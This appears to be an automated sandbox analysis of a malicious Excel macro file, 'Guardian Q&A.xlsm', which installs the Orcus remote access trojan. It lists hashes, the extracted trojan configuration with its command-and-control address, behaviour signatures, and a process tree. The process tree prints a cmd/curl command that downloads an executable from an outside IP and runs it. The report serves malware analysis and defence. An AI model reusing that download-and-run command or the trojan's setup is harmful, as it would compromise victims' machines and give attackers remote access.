Analysis

  • max time kernel
    48s
  • max time network
    50s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250128-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250128-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    01-02-2025 01:43

General

  • Target

    Guardian Q&A.xlsm

  • Size

    3.7MB

  • MD5

    f9379219193a6ad229cb99ea103240cc

  • SHA1

    d7776b47f7d16e66d52ff3d2cda8af982f713ea4

  • SHA256

    8258c96fcb836d6b29aa90529835ed1ee4fe6143bb5221459fe5e4a81b18d2e6

  • SHA512

    c8fcb2db9ecdc4aa7aefd42fc003f8bd8c2a60d1ee59a4a6d573c422812b861487b0c79fd99de4e773afa60ddd4b36a5ee447089a382ddfdfce4ffa82e661a76

  • SSDEEP

    98304:JjD7OuWRWu3nj7fH2a6AuxvczmQjj+xwT+aNaHmt:JjOuaWu3H2a6xeOMwmt

Malware Config

Extracted

Family

orcus

C2

195.88.218.126:10134

Mutex

10dc32abacca449b81dcabfd916e9f3f

Attributes
  • autostart_method

    Disable

  • enable_keylogger

    false

  • install_path

    %programfiles%\Orcus\Orcus.exe

  • reconnect_delay

    10000

  • registry_keyname

    Orcus

  • taskscheduler_taskname

    Orcus

  • watchdog_path

    AppData\OrcusWatchdog.exe

Signatures

  • Orcus

    Orcus is a Remote Access Trojan that is being sold on underground forums.

  • Orcus family
  • Orcus main payload 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Orcurs Rat Executable 2 IoCs
  • Downloads MZ/PE file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 10 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs
  • cURL User-Agent 1 IoCs

    Uses User-Agent string associated with cURL utility.

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Guardian Q&A.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4784
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /V /C "set u=http://195.88.218.126:8000/Guardian.exe&set p=C:\Users\Admin\AppData\Local\Temp\Guardian.exe&curl --insecure -o !p! !u! && start !p!"
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:892
      • C:\Windows\system32\curl.exe
        curl --insecure -o C:\Users\Admin\AppData\Local\Temp\Guardian.exe http://195.88.218.126:8000/Guardian.exe
        3⤵
        • Downloads MZ/PE file
        PID:3568
      • C:\Users\Admin\AppData\Local\Temp\Guardian.exe
        C:\Users\Admin\AppData\Local\Temp\Guardian.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:4508

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Guardian.exe

    Filesize

    903KB

    MD5

    7735277130eafeaa269fee4b3c00f2bb

    SHA1

    57ae0c9d4a0f17730be54aa7dc7b808e32335101

    SHA256

    49d0bfca5b66fc459c26eec5d98bb98efd72f3a6d0ac64141ec7eb65e3983ec7

    SHA512

    a1807a81868d2464cd32949d30e11dc54710a6890bc6cffecfb3a83808a4468c8ddd090b9a412c094ca3138fe3fab21eb00b869e0b573c20a5c6435c14c5e59c

  • C:\Users\Admin\AppData\Roaming\Orcus\lib_10dc32abacca449b81dcabfd916e9f3f\SharpDX.DXGI.dll

    Filesize

    125KB

    MD5

    2b44c70c49b70d797fbb748158b5d9bb

    SHA1

    93e00e6527e461c45c7868d14cf05c007e478081

    SHA256

    3762d43c83af69cd38c9341a927ca6bd00f6bae8217c874d693047d6df4705bf

    SHA512

    faced62f6ecbfa2ee0d7a47e300302d23030d1f28758cbe9c442e9d8d4f8359c59088aa6237a28103e43d248c8efc7eeaf2c184028701b752df6cce92d6854d0

  • C:\Users\Admin\AppData\Roaming\Orcus\lib_10dc32abacca449b81dcabfd916e9f3f\SharpDX.Direct3D11.dll

    Filesize

    271KB

    MD5

    98eb5ba5871acdeaebf3a3b0f64be449

    SHA1

    c965284f60ef789b00b10b3df60ee682b4497de3

    SHA256

    d7617d926648849cbfef450b8f48e458ee52e2793fb2251a30094b778aa8848c

    SHA512

    a60025e304713d333e4b82b2d0be28087950688b049c98d2db5910c00b8d45b92e16d25ac8a58ff1318de019de3a9a00c7cbf8a6ad4b5bb1cb175dafa1b9bea2

  • C:\Users\Admin\AppData\Roaming\Orcus\lib_10dc32abacca449b81dcabfd916e9f3f\SharpDX.Direct3D9.dll

    Filesize

    338KB

    MD5

    934da0e49208d0881c44fe19d5033840

    SHA1

    a19c5a822e82e41752a08d3bd9110db19a8a5016

    SHA256

    02da4af8cd4a8de19d816000caaae885e676b9e52f136ff071a279c2b8ad34c7

    SHA512

    de62f629c2299b50af62893244a28895d63b78138c8632449984306f45de16bd01076eadbb0d75a700215e970c1df731e202ea640236c0f0da6ed15146193b59

  • C:\Users\Admin\AppData\Roaming\Orcus\lib_10dc32abacca449b81dcabfd916e9f3f\SharpDX.dll

    Filesize

    247KB

    MD5

    ffb4b61cc11bec6d48226027c2c26704

    SHA1

    fa8b9e344accbdc4dffa9b5d821d23f0716da29e

    SHA256

    061542ff3fb36039b7bbffdf3e07b66176b264c1dfd834a14b09c08620717303

    SHA512

    48aa6130bf1f5bd6de19256bbdf754c0158b43dd122cec47bb801a7a7b56f2da268bfdec24d135621764a23278ead3dcc35911a057e2dfa55a348bae8ef7b8a9

  • C:\Users\Admin\AppData\Roaming\Orcus\lib_10dc32abacca449b81dcabfd916e9f3f\TurboJpegWrapper.dll

    Filesize

    1.3MB

    MD5

    ac6acc235ebef6374bed71b37e322874

    SHA1

    a267baad59cd7352167636836bad4b971fcd6b6b

    SHA256

    047b042cebf4c851f0d14f85f16ce952f03e48c20362d4ed9390875d4900fe96

    SHA512

    72ac8b8c8f27264cc261297c325d14a0be2084d007c6132ab8402d87f912fe9189cb074db11625d9f86d29a6188f22a89e58ae45c9131fac4522473567017081

  • memory/4508-64-0x0000000006A90000-0x0000000006AD4000-memory.dmp

    Filesize

    272KB

  • memory/4508-41-0x0000000004F40000-0x0000000004F52000-memory.dmp

    Filesize

    72KB

  • memory/4508-104-0x00000000077F0000-0x0000000007944000-memory.dmp

    Filesize

    1.3MB

  • memory/4508-94-0x0000000005BF0000-0x0000000005C16000-memory.dmp

    Filesize

    152KB

  • memory/4508-84-0x0000000006BE0000-0x0000000006C3A000-memory.dmp

    Filesize

    360KB

  • memory/4508-74-0x0000000006B90000-0x0000000006BDA000-memory.dmp

    Filesize

    296KB

  • memory/4508-45-0x00000000063D0000-0x0000000006436000-memory.dmp

    Filesize

    408KB

  • memory/4508-54-0x0000000007280000-0x0000000007442000-memory.dmp

    Filesize

    1.8MB

  • memory/4508-53-0x0000000006880000-0x000000000698A000-memory.dmp

    Filesize

    1.0MB

  • memory/4508-52-0x0000000006700000-0x000000000674C000-memory.dmp

    Filesize

    304KB

  • memory/4508-51-0x00000000066C0000-0x00000000066FC000-memory.dmp

    Filesize

    240KB

  • memory/4508-50-0x0000000006660000-0x0000000006672000-memory.dmp

    Filesize

    72KB

  • memory/4508-49-0x0000000006C60000-0x0000000007278000-memory.dmp

    Filesize

    6.1MB

  • memory/4508-38-0x0000000004DF0000-0x0000000004E4C000-memory.dmp

    Filesize

    368KB

  • memory/4508-43-0x0000000005410000-0x0000000005420000-memory.dmp

    Filesize

    64KB

  • memory/4508-42-0x00000000053A0000-0x00000000053B8000-memory.dmp

    Filesize

    96KB

  • memory/4508-36-0x0000000000370000-0x0000000000458000-memory.dmp

    Filesize

    928KB

  • memory/4508-37-0x0000000002700000-0x000000000270E000-memory.dmp

    Filesize

    56KB

  • memory/4508-44-0x0000000005DC0000-0x0000000005DCA000-memory.dmp

    Filesize

    40KB

  • memory/4508-39-0x0000000005470000-0x0000000005A16000-memory.dmp

    Filesize

    5.6MB

  • memory/4508-40-0x0000000004F60000-0x0000000004FF2000-memory.dmp

    Filesize

    584KB

  • memory/4784-15-0x00007FFF7E6B0000-0x00007FFF7E8A8000-memory.dmp

    Filesize

    2.0MB

  • memory/4784-7-0x00007FFF7E6B0000-0x00007FFF7E8A8000-memory.dmp

    Filesize

    2.0MB

  • memory/4784-9-0x00007FFF7E6B0000-0x00007FFF7E8A8000-memory.dmp

    Filesize

    2.0MB

  • memory/4784-13-0x00007FFF7E6B0000-0x00007FFF7E8A8000-memory.dmp

    Filesize

    2.0MB

  • memory/4784-6-0x00007FFF7E6B0000-0x00007FFF7E8A8000-memory.dmp

    Filesize

    2.0MB

  • memory/4784-127-0x00007FFF3E730000-0x00007FFF3E740000-memory.dmp

    Filesize

    64KB

  • memory/4784-47-0x00007FFF7E74D000-0x00007FFF7E74E000-memory.dmp

    Filesize

    4KB

  • memory/4784-48-0x00007FFF7E6B0000-0x00007FFF7E8A8000-memory.dmp

    Filesize

    2.0MB

  • memory/4784-14-0x00007FFF7E6B0000-0x00007FFF7E8A8000-memory.dmp

    Filesize

    2.0MB

  • memory/4784-18-0x00007FFF7E6B0000-0x00007FFF7E8A8000-memory.dmp

    Filesize

    2.0MB

  • memory/4784-19-0x00007FFF7E6B0000-0x00007FFF7E8A8000-memory.dmp

    Filesize

    2.0MB

  • memory/4784-20-0x00007FFF7E6B0000-0x00007FFF7E8A8000-memory.dmp

    Filesize

    2.0MB

  • memory/4784-17-0x00007FFF3C530000-0x00007FFF3C540000-memory.dmp

    Filesize

    64KB

  • memory/4784-16-0x00007FFF7E6B0000-0x00007FFF7E8A8000-memory.dmp

    Filesize

    2.0MB

  • memory/4784-55-0x00007FFF7E6B0000-0x00007FFF7E8A8000-memory.dmp

    Filesize

    2.0MB

  • memory/4784-8-0x00007FFF3E730000-0x00007FFF3E740000-memory.dmp

    Filesize

    64KB

  • memory/4784-0-0x00007FFF3E730000-0x00007FFF3E740000-memory.dmp

    Filesize

    64KB

  • memory/4784-4-0x00007FFF7E6B0000-0x00007FFF7E8A8000-memory.dmp

    Filesize

    2.0MB

  • memory/4784-12-0x00007FFF7E6B0000-0x00007FFF7E8A8000-memory.dmp

    Filesize

    2.0MB

  • memory/4784-2-0x00007FFF3E730000-0x00007FFF3E740000-memory.dmp

    Filesize

    64KB

  • memory/4784-11-0x00007FFF7E6B0000-0x00007FFF7E8A8000-memory.dmp

    Filesize

    2.0MB

  • memory/4784-3-0x00007FFF3E730000-0x00007FFF3E740000-memory.dmp

    Filesize

    64KB

  • memory/4784-10-0x00007FFF3C530000-0x00007FFF3C540000-memory.dmp

    Filesize

    64KB

  • memory/4784-1-0x00007FFF7E74D000-0x00007FFF7E74E000-memory.dmp

    Filesize

    4KB

  • memory/4784-5-0x00007FFF3E730000-0x00007FFF3E740000-memory.dmp

    Filesize

    64KB

  • memory/4784-126-0x00007FFF3E730000-0x00007FFF3E740000-memory.dmp

    Filesize

    64KB

  • memory/4784-128-0x00007FFF3E730000-0x00007FFF3E740000-memory.dmp

    Filesize

    64KB

  • memory/4784-129-0x00007FFF3E730000-0x00007FFF3E740000-memory.dmp

    Filesize

    64KB

  • memory/4784-46-0x00007FFF7E6B0000-0x00007FFF7E8A8000-memory.dmp

    Filesize

    2.0MB

  • memory/4784-130-0x00007FFF7E6B0000-0x00007FFF7E8A8000-memory.dmp

    Filesize

    2.0MB